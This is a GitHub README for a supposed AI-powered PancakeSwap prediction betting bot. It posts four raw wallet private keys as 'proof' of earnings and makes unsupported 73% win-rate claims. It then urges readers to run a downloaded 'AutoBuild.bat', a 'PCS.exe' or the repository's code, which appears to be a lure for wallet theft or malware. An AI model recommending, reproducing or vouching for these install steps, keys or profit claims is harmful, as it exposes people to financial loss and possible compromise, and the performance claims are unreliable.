Skip to content

AI-powered PancakeSwap Prediction Bot enables automatic betting. It analyzes market movements with a user-friendly interface and offers betting strategies.

License

Notifications You must be signed in to change notification settings

predictexpert/pancake-predict-bot-UI-Supported

Repository files navigation

🔮 PancakeSwap Prediction Bot UI v9.3.1 🚀

PancakeSwap Prediction Bot using AI recommendations.

After accessing the wallet with the key below, connect to the Pancakeswap BNB Prediction game. See for yourself how I earned +6 bnb with a 73% success rate. This is just an experiment we do with an example wallet. You can do more!

Below are the private keys of a few of my recent wallets:

  • Private key: c32268848bc283b68cf0b9079f3538774ff78fd69eacf43164b33b0c8890b858
  • Private key: ae6d9aaf4ea944c586a4f38148d362ca35cb95fb2b4949520b31c86641686e75
  • Private key: 3dcc0bc65a256eb9bf7584af28992ab3037c3818ac94743fd8b4e15315b1ff2f
  • Private key: 5192b3ff45eb69e460bd924fb7379be089515d19f7a418499b2c303249db3bd9

(Do not put money into the wallet whose key is written above. This may result in the loss of your funds. Use this wallet only to review earnings statistics.)

⭐Please consider giving a star

New Interface Front Screen

UI

Exciting Updates!

We are thrilled to announce significant enhancements to our application, featuring a brand-new user-friendly interface. Our dedication to improving user experience extends to the integration of four valuable new working strategies.

New Features:

  1. Intuitive User Interface: Our application now boasts a revamped and intuitive interface, ensuring a seamless and enjoyable user experience.

  2. Diverse Working Strategies: Explore four new distinct working strategies, each designed to enhance the effectiveness and versatility of the bot.

  3. One-Click Replicate Transactions Of The Target Wallet : With a single click, users can conveniently replicate the transactions of any desired wallet, effortlessly executing trades from their own wallet.

  4. Enhanced Security Measures: We prioritize user security and have introduced unique features not found in other bots:

    • Metamask Integration: Seamlessly connect your Metamask wallet, providing an added layer of security.
    • Wallet Connect Support: Enjoy the convenience of connecting your wallet using "Wallet Connect," eliminating the need to expose your private key.

With these updates, our goal is to provide a safer, more flexible, and user-centric trading experience. We look forward to your continued success with our improved application!

Evidences dated 12 JUNE 2024

Winning rate Winning rate

🐰⚡ Installation

  • Download This Repo the repository release and extract files.
  • Double-click on the "AutoBuild.bat"
  • And follow the instructions in the application window.

🐰⚡ Installation on Windows

Way 1

  • Download WindowsApp the latest version.
  • Double-Click on the "PCS.exe" open to run it.

Way 2 - CMD

Download and Install Git here: Git_Win / Git_Mac

Download and Install Python here: Python 3.12.1

Then run the following commands in CMD:

git clone https://github.com/predictexpert/pancake-predict-bot-UI-Supported
cd pancake-predict-bot-UI-Supported
pip install -r requirements.txt
python3 main.py

🐰⚡ Installation - MacOS

Go First and make sure python is installed

Then run the following commands in Terminal:

git clone https://github.com/predictexpert/pancake-predict-bot-UI-Supported
cd pancake-predict-bot-UI-Supported
pip install -r requirements.txt
python3 main.py

Strategy (You can easily configure all parameter settings through the interface)

AI Strategy (AI_STRATEGY)

  • This advanced strategy leverages artificial intelligence for highly consistent real-time predictions.
  • The AI model analyzes 7 crucial data points simultaneously to make predictions that influence the value of BNB.
  • The strategy considers a range of key factors in real-time, providing optimal decision-making capabilities.
  • With AI support, the bot aims to make informed and reliable predictions for optimal betting outcomes.

Pattern Strategy (PATTERN_STRATEGY)

  • This strategy aims to place bets based on similar outcomes from previous rounds.
  • The EVENT_PATTERN_NUMBER parameter helps the bot determine the number of previous rounds with the same outcome.
  • To enhance accuracy in predicting upcoming round results, the DELTA_PRICE_THRESHOLD parameter sets a threshold for significant price differences.

Copy Trading Strategy (COPY_TRADING_STRATEGY)

  • This strategy allows the bot to mimic betting transactions of a specified wallet address.
  • The wallet address to emulate is set using the WALLET_ADDRESS_TO_EMULATE textbox.

Quote Strategy (QUOTE_STRATEGY)

  • This strategy involves placing bets based on the payment quote of PancakeSwap smart contracts.
  • The SELECT_LOWER_QUOTE feature determines whether the bot should bet on a lower or higher quote.

Signal Strategy (SIGNAL_STRATEGY)

  • This strategy enables the bot to place bets based on trading signals obtained from TradingViewScan.
  • The REVERSE_BETTING feature allows the bot to place downward bets if signals suggest upward movement.
  • Signal accuracy is controlled using the THRESHOLD parameter, set at a default of 55%.
  • The default data source for trading signals is Binance.

💰You can check the history of rounds and claim rewards here: https://pancakeswap.finance/prediction

👁️ Disclaimers

Avoid any bot that requires you to write down your private key. All the other sources I've reviewed that request the private key end up stealing all funds, leaving you with no one to contact.

Please be aware of clones

Support Chat

Join the telegram support chat You can access all our announcements here.

About

AI-powered PancakeSwap Prediction Bot enables automatic betting. It analyzes market movements with a user-friendly interface and offers betting strategies.

Topics

Resources

License

Stars

Watchers

Forks

Packages

No packages published